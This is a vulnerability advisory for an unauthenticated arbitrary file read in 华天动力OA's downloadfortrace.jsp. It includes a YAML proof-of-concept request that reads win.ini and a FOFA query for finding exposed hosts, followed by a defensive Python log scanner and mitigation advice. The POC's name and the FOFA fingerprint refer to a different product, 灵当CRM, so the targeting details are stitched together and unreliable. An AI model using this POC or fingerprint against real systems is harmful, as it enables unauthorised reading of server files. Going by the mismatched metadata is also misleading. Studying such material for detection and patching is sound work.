Vulnerability description
The downloadfortrace.jsp endpoint of 华天动力OA has an arbitrary file read vulnerability. An unauthenticated attacker can exploit it to retrieve sensitive files from the server's file system, leaving the system in an extremely insecure state.
fofa: body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
```yaml
id: huatiandongli-oa-downloadfortrace-fileread
info:
  name: 灵当CRM Playforrecord.php 任意文件读取漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    华天动力OA downloadfortrace.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
    fofa:body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
  reference:
    - https://cloud.tencent.com/developer/article/2443505
  tags: huatiandongli,oa,fileread
  created: 2025/08/19
set:
  hostname: request.url.host
rules:
  r0:
    request:
      method: GET
      path: /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini
    expression: >-
      response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()
```
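The POC above probes the endpoint with an absolute Windows path in the `filePath` parameter. A defender can hunt for the same pattern in web-server access logs: any request to this endpoint whose `filePath` is an absolute path, carries a drive letter, or contains a `..` segment after URL decoding is outside the intended use and should be flagged. The scanner below is an added example written for this page, not code from the POC or the vendor; it assumes combined-format access logs (constructed sample lines are embedded) and that the parameter name is `filePath` as in the POC.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint named in the POC; matched case-insensitively.
ENDPOINT = "/OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp".lower()

# Combined access-log format (Apache/Tomcat style) is an assumption.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Leading slash/backslash or a drive letter means an absolute path.
ABS_OR_DRIVE = re.compile(r"^(?:[a-zA-Z]:|[\\/])")

# Constructed sample lines; not real traffic. Line 1 mirrors the POC request,
# line 2 is the same path URL-encoded, line 3 uses ".." segments, line 4 is a
# benign relative download, line 5 is an unrelated page.
SAMPLE_LOGS = [
    '10.0.0.5 - - [19/Aug/2025:10:01:02 +0800] "GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini HTTP/1.1" 200 412',
    '10.0.0.5 - - [19/Aug/2025:10:01:03 +0800] "GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c%3A%5Cwindows%5Cwin.ini HTTP/1.1" 200 412',
    '10.0.0.5 - - [19/Aug/2025:10:01:04 +0800] "GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=..%2F..%2Fconf%2Fdb.properties HTTP/1.1" 200 880',
    '10.0.0.9 - - [19/Aug/2025:10:02:00 +0800] "GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=trace/20250819/report.doc HTTP/1.1" 200 51200',
    '10.0.0.9 - - [19/Aug/2025:10:02:05 +0800] "GET /OAapp/index.jsp HTTP/1.1" 200 1024',
]


def is_suspicious_path(value):
    """True if a filePath value escapes a relative, traversal-free form."""
    decoded = unquote(value).replace("\\", "/")  # second decode catches double-encoding
    if ABS_OR_DRIVE.match(decoded):
        return True
    return any(seg == ".." for seg in decoded.split("/"))


def scan_access_log(lines):
    """Return one hit dict per request to the endpoint with a suspicious filePath."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path.lower() != ENDPOINT:
            continue
        params = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
        for value in params.get("filepath", []):  # parse_qs already URL-decoded once
            if is_suspicious_path(value):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "filePath": value})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOGS):
        print(hit)
```

A status of 200 on a flagged line indicates the read most likely succeeded, so those hosts and paths are the ones to triage first; until the vendor fix is applied, restricting `filePath` to a fixed download directory (or blocking the endpoint at the WAF) removes the exposure.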